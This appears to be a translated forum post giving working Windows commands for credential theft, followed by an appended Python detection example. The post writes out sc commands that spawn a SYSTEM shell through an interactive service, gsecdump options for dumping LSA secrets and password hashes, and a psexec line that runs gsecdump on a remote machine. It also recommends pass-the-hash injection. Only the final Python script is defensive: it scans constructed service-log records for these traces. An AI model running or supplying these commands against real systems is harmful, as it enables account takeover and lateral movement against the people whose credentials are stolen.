To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process, achieving a hash-injection attack. Those foreigners really are good; this will keep administrators busy. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually don't need the password cracked at all; this is just using the tool. As the original article puts it well, no matter whether the password is 4 characters or 127, once you have the hash it's 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
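The steps quoted above (a service whose binary is cmd.exe, the 1053 start timeout, and PsExec's helper service) all leave traces in the Service Control Manager log. As an added example, not code from this post or from the original truesec article, the Python below scans constructed log records for those traces; the flattened one-record-per-line layout is an assumption for the example, not the real EVTX structure.

```python
import re
from typing import Dict, List

# Constructed Windows System log records, flattened one per line (7045 = "A service
# was installed in the system", 7000 = service failed to start). The field layout
# is an assumption for this example, not the real EVTX structure.
SAMPLE_LOG = """\
7045|ServiceName=shellcmdline|ImagePath=C:\\WINDOWS\\system32\\cmd.exe /K start|Account=LocalSystem
7045|ServiceName=Spooler|ImagePath=C:\\WINDOWS\\system32\\spoolsv.exe|Account=LocalSystem
7045|ServiceName=PSEXESVC|ImagePath=C:\\WINDOWS\\PSEXESVC.exe|Account=LocalSystem
7000|ServiceName=shellcmdline|Error=1053
"""
# Interpreters and shells that no legitimate service should register as its binary.
SHELL_BINARIES = re.compile(r"\\(cmd|powershell|wscript|cscript)\.exe\b", re.IGNORECASE)
PSEXEC_SERVICE = "PSEXESVC"  # helper service name PsExec installs on the target

def parse_record(line: str) -> Dict[str, str]:
    """Split one flattened record into a dict; the first field is the event id."""
    event_id, *fields = line.strip().split("|")
    rec = {"EventID": event_id}
    for f in fields:
        k, _, v = f.partition("=")
        rec[k] = v
    return rec

def flag_record(rec: Dict[str, str]) -> List[str]:
    """Reasons this record looks like the SYSTEM-shell / PsExec pattern above."""
    reasons = []
    if rec["EventID"] == "7045":
        path = rec.get("ImagePath", "")
        if SHELL_BINARIES.search(path):
            reasons.append("service binary is a shell/interpreter: " + path)
        if rec.get("ServiceName", "").upper() == PSEXEC_SERVICE:
            reasons.append("PsExec helper service installed")
    elif rec["EventID"] == "7000" and rec.get("Error") == "1053":
        # cmd.exe never reports READY to the SCM, so the start "fails" with 1053
        # even though the process it spawned keeps running.
        reasons.append("start timed out (1053): binary is not a real service")
    return reasons

def scan(log_text: str) -> Dict[str, List[str]]:
    """Map each flagged service name to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for line in filter(str.strip, log_text.splitlines()):
        rec = parse_record(line)
        reasons = flag_record(rec)
        if reasons:
            findings.setdefault(rec.get("ServiceName", "?"), []).extend(reasons)
    return findings
```

Running `scan(SAMPLE_LOG)` flags shellcmdline (shell binary plus 1053 timeout) and PSEXESVC, and leaves Spooler alone.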